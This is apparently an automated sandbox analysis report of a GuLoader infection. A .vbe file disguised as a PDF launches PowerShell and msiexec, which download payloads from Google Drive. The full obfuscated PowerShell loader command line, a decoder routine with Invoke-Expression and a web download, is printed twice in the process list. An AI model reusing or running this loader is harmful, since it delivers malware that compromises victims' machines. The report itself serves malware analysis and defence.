                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49729 | 142.250.181.1 | 443 | 7364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 15:53:26 UTC | 139 | OUT | GET /download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download HTTP/1.1
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
2024-11-20 15:53:29 UTC | 4904 | IN | HTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="Gowany.emz"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 459852
                                                                  Last-Modified: Wed, 20 Nov 2024 08:40:18 GMT
                                                                  X-GUploader-UploadID: AFiumC4PFP0nWPOXXQ3zIEDjNx7rWQ7tz7jKsJveiEC3a4CgT-5GSdSv7YTtYsPxDnnhltbpUg
                                                                  Date: Wed, 20 Nov 2024 15:53:28 GMT
                                                                  Expires: Wed, 20 Nov 2024 15:53:28 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=BfWl0g==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  Data Ascii: uHyxPblsZDK4fLEyuHyxMrh8sTK4fLEyuHyxMrh8Ykh8BgVgAsSvgU39Qz72SAWzSi5MGCr9Q8+14t+zSmcQAQUsLbtYdaGvPYTIKJkDRjhlfyT2xooqPBdC9usc5QmDhB3aB/S75MBhrFD4uVe+GdoKCv/O0R1TpFgio4rXNOngRERo3nN2ALh8sTK4fLEyuHyxMrh8sTK4fLEyuHyx62J3flmZrMsU4FOcB5RqfU3AmWETNFhw+p5CfT7rWqV


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.5 | 49799 | 172.217.19.174 | 443 | 8020 | C:\Windows\SysWOW64\msiexec.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-11-20 15:53:55 UTC | 216 | OUT | GET /uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  2024-11-20 15:53:56 UTC | 1766 | IN | HTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:56 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-FAil_2IwX45kT0kE2elpFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.5 | 49805 | 142.250.181.1 | 443 | 8020 | C:\Windows\SysWOW64\msiexec.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-11-20 15:53:58 UTC | 258 | OUT | GET /download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  2024-11-20 15:54:01 UTC | 4919 | IN | HTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="NKbevViFuEGeFpIGnNn60.bin"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 493120
                                                                  Last-Modified: Wed, 20 Nov 2024 08:36:35 GMT
                                                                  X-GUploader-UploadID: AFiumC44eya3z_TP1HVWAGMp_Hv-6nryWZr91bzOt2rpW94wdbWw9_XDM9RodkYAsxNVQRpUXQ
                                                                  Date: Wed, 20 Nov 2024 15:54:00 GMT
                                                                  Expires: Wed, 20 Nov 2024 15:54:00 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=+2wIuw==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close



                                                                  Target ID:0
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe"
                                                                  Imagebase:0x7ff70ea80000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 
'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc 
ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. 
islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:10:53:34
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 
'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc 
ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. 
islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
                                                                  Imagebase:0x1b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:10:53:34
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
